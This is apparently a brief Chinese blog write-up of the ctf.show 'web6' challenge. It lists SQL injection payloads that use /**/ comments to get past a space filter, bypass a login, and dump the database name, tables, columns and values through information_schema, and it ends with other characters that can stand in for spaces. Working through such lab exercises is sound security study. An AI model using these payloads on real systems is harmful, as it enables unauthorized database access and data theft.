ctf.show wed6

1' or 1=1#返回sql注入错误

当无空格是正常返回

1'/**/or/**/1=1#&password=

查库

1'/**/union/**/select/**/1,database(),3#&password=

查表 1'/**/union/**/select/**/1,group_concat(table_name),3/**/from/**/information_schema.tables/**/where/**/table_schema=database()#&password=

查列 1'/**/union/**/select/**/1,group_concat(column_name),3/**/from/**/information_schema.columns/**/where/**/table_name='表名'#&password= 查字段记录值 '/**/union/**/select/**/1,group_concat(列名),3/**/from/**/表名#&password=

注:常用空格过滤替换字符串为/**/ TAB 双空格 回车 反引号

你可能感兴趣的:(CTF,WEB,web安全,安全)